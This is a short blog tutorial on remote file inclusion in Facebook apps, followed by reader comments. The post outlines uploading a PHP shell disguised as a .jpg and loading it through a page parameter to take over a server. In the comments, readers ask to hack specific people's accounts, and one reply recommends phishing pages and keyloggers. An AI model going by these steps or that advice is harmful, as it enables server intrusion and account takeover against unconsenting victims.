Facebook Hacking: Remote File Inclusion Attack
Facebook being the world's largest social networking website has became the major target for the hackers, attackers and other malicious users. Facebook has hired the team world's leading security experts in order for them to improve their website's security. Moreover facebook also pays 500$ to any one who can identify any sort of vulnerability inside facebook.
The facebook security team has done a very great job in improving and taking facebook's security to the maximum level. However, the problem is that Facebook applications are not coded or monitored by facebook, and it's also not possible that facebook to monitor every single app for vulnerabilities. These facebook apps are mostly coded by common programmers who are not well aware of how a code is written securely. Which leaves facebook apps poured with common vulnerabilities like XSS ( CROSS SITE SCRIPTING), Clickjacking, Remote file inclusion etc.
Out of all of these web application vulnerabilities, Remote file inclusion is a very common web application attack which occurs because the application is not able to validate included files. According to imperva, 21% of the apps on facebook are vulnerable to remote file inclusion attack.
Here is how the attack is carried out:
Step 1 - The attacker creates a malicious jpg file, because the upload of PHP is mostly banned on webservers with user level privileges. Therefore the hacker renames a PHP shell to some thing like shell.php.jpg in order to upload it to the webserver.
Step 2 - Next the hacker exploits RFI vulnerability in order to reference malicious JPG, which paramtere is something like.
.php?page=url of your malicious image
Step 3 - Next the attacker takes control of the server by just going to the url of the JPG image.
Mitigation:
Imperva suggests a four step mitigation process which can be found inside the image below, However it includes the deployment of web application firewall, but what if some one is not using a WAF, However will he be protected.
Exploiting RFI And Mitigation
You might also like:
Really Nice one
ReplyDeletebut Image explanation will help for n00bs
Regards
M.Gazzaly
http://www.gazzaly.info
sv11@ if you can give a video tutorial with details then it will be much more helpful.... As most of us are beginner so its not receptive to us with these technical terms....
ReplyDeleteHope a reply
@Anonymous 2
ReplyDeleteI will make a tutorial soon.
@Gazzaly
Really didn't understand what you were trying to say?
hi could u please help me hack acount of my friend please ir is my email anniejoymarcelo@yahoo.com
ReplyDeletehi! cant you pls help me to learn. how to hack a fb account? this is important not only a game. is about a mistres of my friend husband. thank you search me in fb account maria annah
ReplyDeleteu can make fake fb page and send it to victim or u can install a keylogger in the pc....
ReplyDelete